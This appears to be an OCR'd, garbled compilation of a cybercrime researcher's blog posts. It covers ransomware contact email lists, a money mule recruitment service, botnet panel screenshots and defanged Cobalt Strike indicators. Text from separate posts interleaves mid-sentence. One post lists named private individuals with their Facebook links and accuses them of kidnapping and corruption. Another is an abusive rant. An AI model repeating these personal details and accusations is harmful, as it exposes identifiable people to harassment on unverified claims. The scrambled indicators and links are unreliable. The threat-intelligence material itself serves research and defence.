rusoftfond@protonmail.com 
SupportOdveta@protonmail.com 
Empty003@protonmail.com 
backuppcl@protonmail.com 
petersburgrecover@protonmail.com 
cashdashsentme@protonmail.com 
btc.com@protonmail.ch 
F-data@protonmail.com 
cryptoplant@protonmail.com 


setestco@protonmail.com 
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Cobra Locker@protonmail.com 
secureserver-eu@protonmail.com 
Dsupport@protonmail.com 
jokeroo@protonmail.com 
incognitoman@protonmail.com 
blackheel@protonmail.com 
SafeGman@protonmail.com 
keepcredit015@protonmail.com 
oktropys@protonmail.com 
cryptopatronum@protonmail.com 
Filegorillal1388@protonmail.com 
3335799@protonmail.com 
filel1@protonmail.com 
key-support@protonmail.com 
paymifordecrypt@protonmail.ch 
soft.russian@protonmail.com 
cyber.duskfly@protonmail.com 
gangflsbang@protonmail.ch 
lion7872@protonmail.com 
FobosAmerika@protonmail.ch 
Mespinoza980@protonmail.com 
Recoverfile@protonmail.com 
UnlockAlexKingman@protonmail.com 
William _Kidd _2019@protonmail.com 
back7@protonmail.ch 
cosanostral9@protonmail.com 
callmegoat@protonmail.com 
noktropys@protonmail.com 
decryptxxx@protonmail.com 
CRIPTON@protonmail.com 
Decryptutility@protonmail.com 
burcr@protonmail.com 
cammoral19@protonmail.com 
worcservice@protonmail.ch 
sifremicoz@protonmail.com 
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johny2recoveryusa@protonmail.com 
Mammon-decrypt@protonmail.com 
fahydremu1981@protonmail.com 
rsupp@protonmail.ch 
Trojan.Bitcharity@protonmail.com.com 
nationalsiense@protonmail.com 
pabluk700@protonmail.ch 
tellyouthepass@protonmail.com 
patern32@protonmail.com 
JoniCarter@protonmail.com 
OttoZimmerman@protonmail.ch 
king.ouroboros@protonmail.com 
Inq@protonmail.com 
asmodey3301@protonmail.com 
spO0Of3rsuppOrt@protonmail.com 
haunexuwofwuf@protonmail.com 
Bitcharity@protonmail.com.com 
newhelper@protonmail.ch 
pizdasobaki@protonmail.com 
ncryptbit2.0@protonmail.com 
cryptomadbusiness@protonmail.com 
RemotePChelper@protonmail.com 
foxnitro@protonmail.com 
barracudahelp@protonmail.com 
honestman0023@protonmail.com 
viiplusloader@protonmail.com 
castor-troy-restore@protonmail.com 
Admincrypt@protonmail.com 
dawndec001@protonmail.com 
AdamBrown89@protonmail.com 
freefoams@protonmail.com 
recoverydata52@protonmail.com 
RomanchukEyla@protonmail.com 
under _amur@protonmail.ch 


momsbestfriend@protonmail.com 
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unlock0101@protonmail.com 
nyougame@protonmail.ch 
deltatechit@protonmail.com 
yougame@protonmail.ch 
djangOunchain3d@protonmail.com 
SafeGman@protonmail.co 
painplain98@protonmail.com 
Vitaly. Yermakov@protonmail.com 
1_kill_ yourself 1@protonmail.com 
Santa _helper@protonmail.com 
databack2@protonmail.com 
recoverydata98@protonmail.com 
filesreturn247@protonmail.com 
Mr.TeslaBrain@protonmail.com 
intercobros@protonmail.com 
data1992@protonmail.com 
nphrasitliter1981@protonmail.com 
bbqb@protonmail.com 
MayarChenot@protonmail.com 
nservicedigilogos@protonmail.com 
mr.leen@protonmail.com 
helpnetin@protonmail.com 
1lrestOre@protonmail.com 
incongnitoman@protonmail.com 
decrypt.russ@protonmail.com 
mykeyhelp@protonmail.com 
mewellwisher@protonmail.ch 
Zagrec@protonmail.com 
support4you@protonmail.com 
RobSmithMba@protonmail.com 
siniyzabor@protonmail.com 
Dercypt@protonmail.com 
loybranunun1975@protonmail.com 
LR FWS_H2M _ET@protonmail.ch 
52pojie _mail@protonmail.com 
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[1]Ah, deja vu! How is it possible that the [2]Scope Group money mule recruitment group 
acting as the employer for the interviewed mule has been "set up in 1990 in New York, the 
USA by three enthusiasts who have financial education" just like [3]AF-GROUP LLC and its 
portfolio of brands, whose 30k [4]botnet operations | exposed and took down in May, 2009, 
next to establishing a direct connection between the botnet and an [5]Ukrainian dating scam 
agency known as "Confidential Connections"? 
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Pretty simple - just like the efficiency-centered mentality applied in the [6]template-ization 
of [7]malware, the ongoing standardization of the money mule recruitment business model 
is resulting in a bogus brand portfolios using identical web site layouts next to the same 
copy writing materials offered by a single vendor exclusively working with money mule 
recruitment organizations only. A couple of years ago, the money mule recruitment process 
was largely inefficient due to the operational security applied - [8]not everyone could become 
a money mule unless certain criteria was met. A newly launched managed money mule 
recruitment design agency that I’ve been monitoring for a while, is poised to help cybercrim- 
inals achieve faster recruitment rates based on the cybercriminal-tailored services it’s offering. 


Whereas it’s been operating beneath the radar for several years, exclusively serving known 
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Look1213@protonmail.com 
JeanRenoAParis@protonmail.com 
artemy75@protonmail.com 
dmo904zB@protonmail.com 
anony.killers@protonmail.com 
CyberSCCP@protonmail.com 
nMayth24@protonmail.com 
tuhafcoderus@protonmail.com 
wayneevenson@protonmail.com 
Bit decrypt@protonmail.com 
unlockme123@protonmail.com 
jonskuper578@protonmail.com 
nomoreletters@protonmail.ch 
aam _sysadmin@protonmail.com 
maxidecrypt@protonmail.com 
execute@protonmail.com 
koxic@protonmail.com 
french101@protonmail.ch 


maill helpme@protonmail.com 


Trojan.Win64.CottleAkela@protonmail.com 


HanzOttoschmidt@protonmail.com 


logiteam@protonmail.com 
crossroads2371@protonmail.ch 
CottleAkela@protonmail.com 
jbomani@protonmail.com 
error-crypt@protonmail.com 
no.xm@protonmail.ch 
rikyrank113@protonmail.com 
decoder83540@protonmail.com 
Mayth24@protonmail.com 
cobain _ransom@protonmail.com 
Xtredboy@protonmail.com 
nunlckr@protonmail.com 
recoverymydata@protonmail.com 


devilguy666@protonmail.com 
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vcredist.bmp.coder007@protonmail.com 
uffla52pojie _mail@protonmail.com 
NetGanster@protonmail.com 
helpadmin2@protonmail.com 
imBoristheBlade@protonmail.com 
nordfox@protonmail.com 
4lok3r@protonmail.com 
mr.dec@protonmail.com 
nBackuppc@protonmail.com 
MilesFlannagan@protonmail.com 
Restore@protonmail.ch 
restorefiles@protonmail.ch 
supportdoctor@protonmail.com 
Killback@protonmail.com 


Sample Tutanota personal email address accounts known to have been involved in various 
ransomware themed campaigns include: 


dokulus@tutanota.com 
legalrestore@tutanota.com 
alexbanan@tuta.io 
remotePChelper@tutanota.com 
f1220@tuta.io 
cryptget@tutanota.com 
recoryfile@tutanota.com 
hallome@tutanota.com 
hitsbtc@tuta.io 

sill@tuta.io 
black.world@tuta.io 
nBioawards@tutanota.com 
berserk666@tutanota.com 
decrfile@tutanota.com 
mr.dec@tutanota.com 
loggitore1984@tuta.io 
mailnitrom@tutanota.com 
Bioawards@tutanota.com 
neftet@tutanota.com 
hildaseriesnetflix125@tutanota.com 
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gorkmork@tutanota.de 
monster666@tuta.io 
goldmind@tuta.io 
fileisafe@tuta.io 
Decrpt@tutanota.com 
Trojan.Win64.AiDcrypt@tutanota.com 
Light Yagami@tuta.io 
developer.110@tutanota.com 
coding 434@tutanota.com 
frankhans@tuta.io 
darkwaiderr@tutanota.com 
johnsmith987654@tutanota.com 
Files2021@tutanota.com 
AiDcrypt@tutanota.com 
Decisivekey@tutanota.com 
aes-ni@tuta.io 
sendr@tutanota.com 
biggsurprise@tutanota.com 
Zizz@tutanota.de 
Merd@tutanota.com 
garrymagic@tutanota.com 
jakie.nunes@tutanota.com 
n3twOrm@tuta.io 
skgrhk2018me@tutanota.com 
jacdecr@tuta.io 
pecunia0318@tutanota.com 
pabpabtab@tuta.io 
getacrypt@tuta.io 
HydaHelp1@tutanota.com 
FilesHelp@tutanota.com 
alphareserve@tuta.io 
systems@tutanota.com 
4lok3r@tutanota.com 
axitrun2@tutanota.com 
johnsonwhate@tutanota.com 
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decodedecode@tutanota.com 
beryl.mclennan@tutanota.de 
Stevensons@tuta.io 
nJamesBaker78@tutanota.com 
yuzhou13@tutanota.com 
grethen@tuta.io 
foxnitro@tutanota.com 
retrnyoufiles@tutanota.com 
InkognitoMan@tutamail.com 
colambia@tutanota.com 
mmm _reborn@tutamail.com 
FlamingoRans@tutamail.com 
internationalassistance@tutanota.com 
klowershit1835@tutanota.com 
cavefat@tuta.io 
jerjis@tutamail.com 
blacknord@tutanota.com 
pixell@tutanota.com.ph 
helperx@tuta.io 
Blmmind@tuta.io 

care nlm@tutamail.cc 
Averia@tuta.io 
adolfhackler@tutanota.com 
AskHelp@tutanota.com 
chily@tuta.io 
antichrist666@tutamail.com 
neuro.net@tuta.io 

vassago 0203@tutanota.com 
zery@tuta.io 

raziotix@tuta.io 
darkencryptor@tutanota.com 
Patagonoa92@tutanota.com 
Trojan.AiDcrypt@tutanota.com 
cricket@tutanota.com 
fixallfiles@tuta.io 
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Citrteam@tutanota.com 
coinsman@tutanota.com 
yO000@tuta.io 
Decfile431@tutanota.com 
kurosaki ichigo@tutanota.co 
randomlocker@tuta.io 
mirey@tutanota.com 
ochennado@tutanota.com 
decspeed@tutanota.com 
jborn@tuta.io 
keyforyou@tuta.io 
host2021@tutanota.com 
marjut65@tutanota.com 
FileEngineering@tutanota.com 
mr.hacker@tutanota.com 
psychopath7@tutanota.com 
gizmo12@tutanota.com 
codiv2021@tutanota.com 


HappyNewYear2021@tutanota.com 


yourfiles1@tutanota.com 
dou876sh@tuta.io 


ndecodedecode@tutanota.com 


nmanagersmaers@tutanota.com 


grdoks@tutanota.com 
Szems@tutanota.com 
EpsilonCrypt@tutanota.com 
zfile@tuta.io 

bad dev@tuta.io 
iamcanhelpyou@tuta.io 
WSS911@tutanota.com 
RestorFile@tutanota.com 
Desparo@tuta.io 
dr.nemo@tutanota.com 
skgrhk2018@tutanota.com 


decodeme666@tutanota.com 
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Secure2017@tuta.io 
nMayth24@tutanota.com 
help@tutanota.com 
cyberunion@tuta.io.cu 
safronov123@tuta.io 
Encrypt4u@tutanota.com 
Helps@tutanota.com 
hebem@tuta.io 
kamira99@tutanota.com 
nmiddleman2020@tutanota.com 
filesrestore@tutanota.com 
nAlanRed@tutanota.com 
prosoft@tutanota.com 
crypthub@tuta.io 
siliconegun@tutanota.com 
dfvdv@tutanota.com 
Mayth24@tutanota.com 
artemy75@tutanota.com 
santino3046@tutanota.de 
nordfox@tutanota.com 
mikrotik@tutamail.com 
zetterlow@tutanota.com 
khalate@tutanota.com 
gamigin0612@tutanota.com 
nobad@tutamail.com 
filemgr@tutanota.com 
sebekgrime@tutanota.com 
DeathSpicy@tutanota.com 
Sherminator.help@tutanota.com 
filekerk@tutanota.com 
Swordflsh@tutanota.com 
xilttbg@tutanota.com 
price.decoding@tutanota.com 
hhaaxxhhaaxx@tuta.io 


AlanRed@tutanota.com 
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MasterLuBu@tutanota.com 
clifieb@tutanota.com 
triplock@tutanota.com 

rep stosd@tuta.io 
n2.Hariliuios@tutanota.com 
ScOrpio0@tutanota.com 
combo@tutanota.de 
adren.kutospov.97@tutanota.com 
help73@tutanota.com 
smartrecav@tutanota.com 
heineken@tuta.io 
SafeGman@tutanota.com 
Sambolero@tutanoa.com 
05250lock@tutamail.com 
gizm0@tutanota.com 
StuardRitchi@tutanota.com 
nAdamBrown89@tutanota.com 
123@tutanota.com 
jessymail26@tuta.io 
neural.net@tuta.io 
ny0000@tuta.io 
nCitrteam@tutanota.com 
satco@tutanota.com 
Blackmax@tutanota.com 
jerjis@tuta.io 
Toni.morrisonl13@tutanota.com.com 
badbusiness@tutanota.de 
dc.dcrypt@tutanota.com 
datareesstore@tutanota.com 
allback@tutanota.com 
Panama777@tutanota.com 
zxqwopnm@tutanota.com 
kurosaki ichigo@tutanota.com 
middleman2020@tutanota.com 


cryptlocker@tutanota.com 
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hinduism0720@tutanota.com 
Soportevoid@tutanota.com 
naes-ni@tuta.io 
Helpcryptl1@tutanota.com 
9eab6e85bd12b@tutanota.com 
aihlp24@tuta.io 
4reserve@tuta.io 
rapid.file@tuta.io 
2.Hariliuios@tutanota.com 
ghjujy@tuta.io 

moloch _helpdesk@tutanota.com 
Decryptoffice@tuta.io 
JamesBaker78@tutanota.com 
unblocked@tuta.io 
BCPFILE17@tutanota.com 

null _ptr@tutanota.de 
flower.harris@tutanota.com 
Starbax@tutanota.com 
nkhalate@tutanota.com 

new _wave@tuta.io 
bitcoins12@tutanota.com 
nginxhole@tutanota.com 

fast decrypt and _protect@tutanota.com 
szem@tutanota.com 
w3qupe@tuta.io 
managersmaers@tutanota.com 
Zeman@tutanota.de 
TomLee24@tuta.io 
kuk1@tuta.io 
ICanFixYourFiles@tutanota.com 
de _cryption@tuta.io 
wilhelmkox@tutanota.com 
lafoievologjaninl23@tutanota.com 
fonix@tuta.io 
backuppc@tuta.io 
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nAskHelp@tutanota.com 
technopc@tutanota.com 
nmode@tutanota.com 
AdamBrown89@tutanota.com 
juniorwanme@tutanota.com 
xser@tutanota.com 
dorispackman@tuta.io 
warthunder089@tutanota.de 
nfilekerk@tutanota.com 
Helpsdec@tutanota.com 
xzet@tutanota.com 
pol.aris@tutanota.com 


Stay tuned! 


1. bhttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEj9hxJ2EjMjG5z080we0i YMGcCVjaR4jhcgag3DPuPLUQQoa 
QyBEcMhkLPAy4DnJjhzKkMJI2i1£5-tFr9B6wZKhrDHOKYGh33LYe 


18.12.8 Official Complaint Against the Dark City of Troyan, Republic of Bulgaria 
and Local Law Enforcement Regarding Dancho Danchev’s Disappearance 
and Kidnapping and Home Molestation Attempt Circa 2010 - An Analysis 
(2022-12-17 10:03) 


[1] 
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Dear blog readers, 


This is Dancho and I’m further expanding the last post of the "[2]Dancho Danchev’s Disappear- 
ance and Kidnapping and Home Molestation Attempt Circa 2010" blog post series with a variety 
of personal photos and personally identifiable information. 


| wanted to say big thanks to everyone who knew me back then and basically participated in 
this. Big "thanks". 


Sample photos include: 


[3] 
26482 


and trusted cybercriminals, it’s recent mainstream business model is a great example of a 
timely underground market proposition due to the fact that the current economic climate best 
suits the money mule recruitment business model due to its high commissions for processing 
fraudulently obtained money. 


Integrity Group Inc =" les 


© About Us 


© Services > “ 

, BC business solutions 
jalan = Fresh Ideas for your 
i success! 


= Vacancies 


© Ow Partners 


Do you infiltrate the entire assembly line, or do you assess the final product? Appreciate my 
rhetoric as usual, it’s full disclosure time, hence infiltrating the assembly line. 


In this post, we’ll take a look at five templates offered by the managed money mule re- 
cruitment vendor, assess several of their customers currently using them to launch targeted 
and localized to German spam campaigns aiming to recruit new money mules, expose their 
entire domains portfolio and associated emails used for correspondence with prospective 
money mules. 


Moreover, we'll actually attempt to becoming a money mule by interacting with their 
market proposition, obtain the financial agent agreements, and expose little known facts 
about how sophisticated and social-engineering oriented the entire money mule recruitment 
process really is. 


2651 


[4] 


26483 


[5] 


26484 


[6] 


26485 


[7] 


26486 


] 


8 


[ 


26487 


[9] 


26488 


[10] 


26489 


[11] 


26490 


[12] 


[13] 


26491 


[14] 


26492 


TO ver Pow 
CTFat4 POM 
APEC Pou 
TOPOL. 31 ZPOTA 
TENESOH APOTA 
a 
a a 


THANK YOU FOR YOUR BUSINESS 


For starters, here’s how the service describes itself, and what type of packages it offers to 
prospective money mule recruiters. The less sophisticated package is offered for $900 and 
the corporate version goes for $1700. 


The first one offers the following: 

- fake company site in English 

- template-based correspondence letters for the entire process 

- the entire document required for the process, custom forms, contracts, invoice applications 
etc. 

- a teach-yourself manual including advice and recommendations - available in English and 
Russian 

- sample spam letters in TXT and HTML, in English only 


The corporate version offers the following: 
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[15] 


[16] 
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[17] 
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[18] 
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[19] 
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[20] 
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Personally identifiable information: 

Pavlin Georgiev Hristov: 
https://www.facebook.com/profile.php?id=100005932519460 
Vasil Moev Gachevski: 
https://www.facebook.com/profile.php?id=100030506870037 
Peter Shoshkov: 
https://www.facebook.com/Trompetar.shoshkov 

Katia Edreva: 

https://www.facebook.com/kiedreva 

Vladimir Spasov: 
https://www.facebook.com/vladimir.spasov.39904 

Nicolay Sabchev: 

https://www.facebook.com/NicolaySabchev 
https://soundcloud.com/dj-kundalini 

protobaby@hotmail.com 

Stoyan Stoyanov: 
https://www.facebook.com/profile.php?id=100078518184151 
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Miroslav Cholakov: 
https://www.facebook.com/profile.php?id=100009504600890 
Dimitrina Avramova: 
https://www.facebook.com/dimitrina.avramova 


Yaroslava Hristova: 


https://www.facebook.com/bashellie 
Stay tuned! 
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18.12.9 My Cyber Security Talks Bulgaria Video Presentation - An Analysis 
(2022-12-19 23:40) 


[1] 


Dear blog readers, 


I’ve decided to share with everyone my most recent presentation at [2]Bulgaria’s Cyber Secu- 
rity Talks where | had the privilege to present and meet some pretty interesting and educated 
folks who | hope that enjoyed listening to my presentation. 

Enjoy! 
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- fake company site in several languages, for instance, Dutch, German, Bulgarian, Italian etc. 
- fake signatures representing the CEO, accounts manager etc. 

- multiple spam letters in different languages 

- Managed domain hosting 


- answering machine number as well as a paid Skype subscription as a bonus 


The following are some of the templates - blurred by the vendor in order to protect the 
bogus brands portfolio - currently offered by the service. Three of the templates are already 


in circulation, that means active spamming in Italian and German "offering the Moon", and 
asking for your identity and financial reputation: 


ABOUT US SERVICES CAREERS PARTNERS PRIVACY CONTACTS 


WE ARE 
PERFECT JO 
FOR YOU 


CPSs BS cr BERT ELS NEWS ® 
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Full video [3]here. 


The actual video presentation: 


Sample photos include: 


[4] 


[5] 
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[8] 
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[9] 


[10] 
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[11] 


[12] 
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Stay tuned and see you in 2023! 


1. https: //blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEg_ZhiFi- ggp9amwmZEVh6NBG4Za3rmqEk031qEKdGmr031x 
WiuBZUXTvbbUrNbALdIKDVHdt j qifzFPQa_sUV_L3dKgzWnMONdm2Y 

2. https://www.cybersecuritytalks.bg/ 

3. https://www. youtube. com/watch?v=9xsF jpvH6S4 

4. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhybEZMAmR7 pf 5V5zcWMwBy2D0F 0gzCwH8eQsWOLpKkGTiZE 
8iRBTI gZoYv-mOas3dsdz6gr6qxXXybm7WVX9VE1LAh2ByU9s347P1s 

5. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhNpuvOrss5xwgkfkGbOgUf vJGkgCZtm9qg- Gj INNiCUjW40 
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18.12.10 Exposing the "Data Leaks" Paradise - An Analysis (2022-12-20 01:27) 


[1] 


Entries 


ADMINISTRATOR 


° 


In a world dominated by a countless number of malicious and fraudulent cyber threat actor 
adversaries including the rise of the "penetration testing" crowd whose ultimately goal is to 
actually lower down the entry barriers into the World of Information Security potentially re- 
sulting in thousands of ethical and unethical penetration testing aware users across the globe 
who have the capacity and the potential to target thousands of legitimate Web sites in an 
attempt to take advantage of the "low-hanging fruit" it should be clearly noted that through- 
out the past couple of years a new generation of wannabe hackers and information security 
enthusiasts began to take place namely the rise of the data breach and data leaks commu- 
nity within the Information Security Industry whose ultimately goal is to actually obtain access 
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to compromised and potentially leaked database of confidential records including high-profile 
data leaks in the context of government-based leaked data that will be later on eventually 
traded and attempted to be taken advantage of in the context of launching targeted phishing 
and malware-spreading campaigns potentially affecting hundreds of thousands of users in the 
process. 


Sample uses of these stolen and compromised databases includes: 

- setting the foundation for a successful spear-phishing campaigns 

- setting the foundations for successful targeted malware and exploits serving campaigns 

- setting the foundations for successful widespread spam and botnet propagation campaigns 
- attempting to monetize the stolen database by selling access it to 


- attempting to use double layer monetization for the stolen database by attempting to sell 
access to it including to the actual owners of the database who might be interested in obtaining 
a copy of it 


- biased exclusivity and double layer monetization combination where the attacker might only 
sell the database to its actual owner and actually get rid of it once they receive the payment 


The very notion that cybercriminals including white hat security experts and cybercrime fight- 
ers will eventually attempt to obtain access to for instance a compromised cybercrime forum 
for the purpose of exposing the personal details of its users that also include to possibly track 
down and geolocate including to actually profile and prosecute some of its members should 
be definitely considered as an old-fashioned trend in the actual fight against cybercrime online 
with more users and researchers joining the fight including the actual cybercriminals who might 
take additional measures to actually protect and prevent possible data leaks including various 
other OPSEC (Operational Security) type of measures in terms of positioning their cybercrime- 
friendly forum community as a invite-only or actually launching it in a a vetted and invite-only 
fashion. 


What’s should be clearly noted is that with the mainstream media continuing to raise awareness 
on the existence of high-profile hacking groups and hackers including the rise of the Anonymous 
crowd it should be clearly noted that wannabe and potential hackers would continue trying to 
steal the necessary media attention and actual "know-how" from high-profile hacking groups 
and individual hackers involved in high-profile data leaks and data breaches. 


| believe that on the majority of occasions it’s just ransomware that’s making the headlines 
including its way into corporate networks thanks to the so called initial access brokers who on 
the majority of occasions are known to have been also outsourcing their hacking and network 
compromise needs to third-parties who would basically do an Attack Surface Reconnaissance 
on the Web and will attempt to find a weak spot into the corporate network of the targeted 
victim but would also attempt to data mine and harvest publicly accessible and obtainable 
email address accounts for the purpose of doing active social engineering reconnaissance that 
also includes the attempt to obtain accounting data belonging to these company individuals 
including to launch spear phishing attack campaigns against their infrastructure in an attempt 
to obtain access to their email address accounts home PCs and networks including related 
services ultimately attempting to compromise the security of the targeted network and the 
company in question. 


Stay tuned! 


1. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEh2r- sqCpNau0iDaGH7 vVwa7r-One12mCAm5dSnqJMumdFAt 
2gEF1wMNACzfjJ-Zrq437pcTCnZcwSeNLRM1_sMZ7pbFDH90FNhr0i 
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18.12.11 The Profile of a Bulgarian Dipshit DANS Agent Vasil Stanev from Troyan 
Bulgaria - A Case Study on Local Mockery Corruption Kidnapping Robbery 
and Home Molestation Attempt - An Analysis (2022-12-21 15:11) 


[2]Special thanks. 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEjGzMX_TdgfdJ2712dqXQvvWevpDoNDGCNFQ30fX6y1UjZ5 
IIucGdkDpmc5QNv_20EBOQM1mek- aFERFvofE7R7CceEwqfDc_rCfE 
2. https: //www.facebook. com/vstanev1 


18.12.12 My Official 256GB Research Compilation - An Analysis (2022-12-21 16:36) 


[1] 
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UPDATE: 


Here’s the actual [2]link. 


Dear blog readers, 


Hot off the press. [3]Grab the Torrent. 


Sample photo: 


[4] 
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Cybercrime _Forum_Data_Set_2021.rar 39.4 GB 
Dancho_Danchev_Astalavista_Security_Newsle... 288 MB 
Dancho_Danchev_Blog_Archive JSON_2021.rar 4.15 MB 
Dancho_Danchev_Blog_E-Book_Archive_2021.... 6.06 GB 
Dancho_Danchev_Cyber_Threat_Actors_Analy... 9.24 MB 
Dancho_Danchev_Cybercrime_Research_2021 ... 754 kB 
Dancho_Danchev_Cybercrime_Research_Prese... 10.9 MB 
Dancho_Danchev_Intelligence_Community_2.... 1008 MB 
Dancho_Danchev_Interview_DW_Koobface_Bo... 2.65 MB 
Dancho_Danchev_Iran_Hackers_Personally_Ide... 3.04 GB 
Dancho_Danchev_Iran_White_Paper_2021.rar 255 MB 
Dancho_Danchev_Iran_White_Paper_Part_Two... 9,99 MB 
Dancho_Danchev_Keynote_Koobface_Botnet_... 163 MB 
Dancho_Danchev_Malware_Trends_White_Pap... 2.41 MB 
Dancho_Danchev_Medium_Research_Compila... 60.7 MB 
Dancho_Danchev_Personal_Memoir_Compilat... 164 MB 
Dancho_Danchev_Private_Party_New_Year_Vid... 541 MB 
Dancho_Danchev_Security_Policy_White_ Pape... 2.41 MB 
Dancho_Danchev_Twitter_Account_Archive_2... 864 kB 
Dancho_Danchev_Unit-123_Security_Research... 27.4 MB 
Dancho_Danchev_Webroot_Research_Compil... 602 MB 
Dancho_Danchev_ZDNet_Research_Compilati... 464 MB 
WhoisXML_API Research_Articles_2021.rar 48.6 MB 


Stay tuned! 


1. https://blogger. googleusercontent . com/img/b/R29vZ2x1/AVvXsEgc9xL8tdHWnnmbQ1Qydgtuc6QcKSOPmO5BQHxS11eekoN6z 
QaPdgQTfDulaM4k9K1lhf p6Jfqsifhdwzm5XiwwIT3DTuuTagwts8iq 


2. https: //drive.google.com/file/d/1AeL46L150xZTwx4MiLZTgb2CTnPOf8fz/view?usp=share_link 
3. https: //drive. google. com/file/d/1wqV_NHdTYJSFFQoBmTCpJqrduhUx6m81/view?usp=share_link 
4, httpe://blogger. googleusercontent. con/ing/b/¥26v22/AVwKsEi47bTs8zd288cezb80tln81YBebKaFVAOXTC8icyPDR] 


18.12.13 Exposing a Portfolio of Fake News Disinformation and Misinformation Web 
Site Domains - A Compilation (2022-12-28 00:40) 
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Dear blog readers, 


I’ve decided to share with everyone a currently active domain portfolio of fake news disinfor- 
mation and misinformation web sites which | obtained using technical collection with the idea 
to assist everyone in their cyber attack campaign attribution efforts. 


Download the compilation [2]here. 


Stay tuned! 


1. https: //blogger. googleusercontent .com/img/b/R29vZ2x1/AVvXsEgttt jX- iNcpJLVtCSdahZo6gzixRvnBz6FhXA2X- CUI jlyn 


n9imnhPoiJ5exr7 Jii1fDNBSHuoWn2QZH7mONEcmOKo6URZ6Bgk6q6 


2. https://drive.google.com/file/d/1BPJ7Fv3_bhrnzj1moY-9H1s8yLgidpFi/view?usp=share_link 


18.12.14 Exposing a Portfolio of Currently Active Malware Serving Domain and URLs 
- An Analysis (2022-12-28 01:38) 
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Dear blog readers, 


Interested in finding out the latest and very greatest malicious software download locations for 
research purposes? Check out the following compilation courtesy of my compiled exclusively 
using public sources. 


Grab the compilation from [2]here. 
Stay tuned! 


1. https: //blogger.googleusercontent.com/img/b/R29vVZ2x1/AVVXsEj 7wULRrv4K4PD2rbbEbCLSd1uvU1I64A1iRkAc8U3ghZNPZj 
solc9K8g6GY4yWrkjUa8Tx1L5FSKN6Dui J4sMceAe3p1FjP1MqxXDCa 


2. https: //drive. google. com/file/d/100ShvbVMKM2 Jbw27tqxfBwGohlyCEClv/view?usp=share_link 
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2023 


19.1 January 


19.1.1 Happy Holidays From The (Not) Republic of Bulgaria - An Analysis - Part Two 
(2023-01-17 10:17) 


[1] 


Can you slap it? Do you know that your degree of education is proportional with the price 
size of your t-shirt which means that we’re not interested in counting that much | mean the 
almighty dollar which you can’t behold yourself to all of its mightiness? "Give me a moron and 
I'll beat him" instead of "Give me an IP and I'll move the earth" type of mentality? Are you a 
retard or are you a moron or are you a dipshit where the word cannot really behold itself to its 
almighty awesomeness? Try the two of these as you’re only a low waged moron that cannot 
really count anything between one or two which means the actual times you'll get slapped 
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by someone who'll eventually find out and seek your responsibility for your general moronic 
attitude. It means that you’re a retard. 


Stay tuned! 


1. https: //blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEivISFU5_2aJGgZTkKAdonprCcCZJNdk1PbZHWUMeiM3IR- 
Eg142G6wJFt_G_BPYnP5s50xL30i490WPpUU3RMpJTVKr4DNp9VvkK 


19.1.2 A Peek Inside a Zunker Botnet C&C Administration Panel - An OSINT Analysis 
(2023-01-26 16:40) 


[1] 


As I've been digging deep inside an old threat intelligence and technical collection archive and 
I’ve decided to share several screenshots worth everyone’s while. 


The following is basically several sample screenshots courtesy of the Zunker botnet C &C 
command and control interface which back in the day used to dominate the threat landscape 
including the sophisticated cybercrime ecosystem with some pretty interesting and sophisti- 
cated features. 


Sample screenshots include: 


[2] 
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Oe Bone | Uessagens —! | See — 14! bytes not [Prema jor{ sutne | 


Type: Soar Got mat Refi 1 body (emore mene 


[3] 


[4] 


eo 


Select Resuts 
Last Report 
[2504007] 17:17:17 
(260407) 1727.03 
[250407] 171034 
{25:0407] 17.2645 
[280407] 152959 
[210407] 11,1927 
[240407] 21:15:31 
1260407] 17:1252 
980407] 11:00:55 
1970407] 1025.36 
[240407] 192147 
(200407) 19:58:17 
[240407] 21.4006 
(240407) 214120 
[130407] 19:29:56 
(240407) 1723.46 
[280407] 17:11:47 
[2504007] 04:14:44 
[25-0407] 17069 
[250407] 17:12:12 
1960407] 22-11-19 


Firat Report 

1960407] 18.06.53 
(060407) 18:11:43 
(060407) 18:13.90 
(060407) 18:19:52 
1710407] 02:16:27 
(000407) 19:1719 
[10407] 122643 
1960407] 18:21:00 
(960607) 18:21:06 
960407] 1821.27 
960407] 182224 
960407] 182232 
(960407) 182333 
96-0407) 182523 
060407) 182537 
960407) 182712 
(060607) 18-29-02 
[260407] 18:29:43 
1960607] 18:90:08 
1960607] 18.9027 
960607] 18:31:00 


Bot Ver. Compr 
327 24500 
327 32280 
327 35669 
S27 stats 
27 restr 
327 77 
327) 2h 
327 1peet 
327 cog, 
327 BAIFS. 
327 1agal. 
327 coz 
327 CRDE 
327 989s 
327 50169. 
327 s2pa2_ 
327 72ee 
327 were. 
327 achen 
327 9c70e. 
227 SpCoA. 
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1. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEgHGQNPa_Zf IGU7OdwDX j gUWJVBU2gRBdSEUgEWLh1 cBNAav 
2. https: //blogger . googleusercontent . com/img/b/R29VZ2x1/AVVXsEiol14W1jS91uFRzYnwXRLJvX5B1vo2F16pM_Be2qNNxBsJRI 
3, https://blogger. googleusercontent. con/ing/b/R20v22x/AVwKsEimvejaZ¥Kg0aiMLV cchg® uopyP4RWTpWKgRDtBT y6rHT2NG 
4. https: / blogger. googleusercontent. con/ing/+/R28v22 /AVwXsBhiiopOuTzofTHSUS_1-a8iRhyOZnJoadakSopir2GOGFY 


19.1.3 Exposing a Currently Active and Spreading Cobalt Strike Serving Malicious 
Software Campaign (2023-01-26 16:41) 


he 


[1] 


Behavior Graph 


Sample: rJoLmOSpaqy exe 
Startdate: 12/12/2022 


Architecture: WINDOWS UNKNOWN 


5 253.234 40, 49695, 49696, 49697 y 


DEDIPATH-ALCUS 


Germany 


I’ve just came across to a currently circulating Cobalt Strike serving malicious software cam- 
paign and I’ve decided to share the details with everyone reading this blog. 


Original malware hosting location: hxxp://bsctech[.]ac[.]th/css/43[.lexe 


MD5: d8d8cb60d196a26765261b1ca8604d1e 


Sample C &C server IPs known to have been involved in the campaign include: 


hxxp://5[.]253[.]234[.]40 -> hxxp://5[.]253[.]234[.]40/activity -> 
hxxp://5[.]253[.]234[.]40/activity/submit[.]php 


Sample geolocation of the known C &C server IP: 


[2] 
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Sample C &C server domains known to have been involved in the campaign include: 


hxxp://bpltjykhm[.Jonline 
